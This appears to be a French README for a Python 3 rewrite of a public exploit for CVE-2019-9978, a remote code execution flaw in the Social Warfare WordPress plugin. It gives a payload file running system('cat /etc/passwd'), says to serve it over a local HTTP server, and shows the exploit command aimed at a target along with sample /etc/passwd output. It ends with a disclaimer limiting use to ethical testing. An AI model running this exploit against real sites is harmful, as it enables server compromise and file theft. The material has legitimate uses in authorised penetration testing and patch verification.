
Une vulnérabilité d'exécution de code à distance (RCE) dans le plugin Social Warfare pour WordPress, touchant les versions antérieures à 3.5.3.
Une vulnérabilité d'exécution de code à distance (RCE) dans le plugin Social Warfare pour WordPress, affectant toutes les versions antérieures à 3.5.3.
L'exploit public d'origine était écrit dans une version obsolète de Python et ne fonctionne plus correctement dans les environnements modernes.
J'ai réécrit l'exploit pour qu'il soit entièrement compatible avec Python 3, afin de le rendre plus facile à utiliser, à comprendre et à intégrer dans les outils modernes.
Créez un fichier nommé payload.txt avec le contenu suivant :
<pre>system('cat /etc/passwd')</pre>
Utilisez Python pour servir votre charge utile :
python3 -m http.server 8000
Votre payload.txt sera alors accessible à l'adresse :
http://<your-ip>:8000/payload.txt
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
--payload-uri http://<your-ip>:8000/payload.txt
Si la cible est vulnérable, vous recevrez une sortie similaire à :
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...



🧬 Si cette charge utile vous a rendu service, une ⭐ ferait ma journée.
< 3.5.3⚠️ Avertissement : Ce dépôt est uniquement destiné à des fins éducatives et de test éthique.
Toute utilisation non autorisée de cet exploit contre des systèmes qui ne vous appartiennent pas est strictement interdite.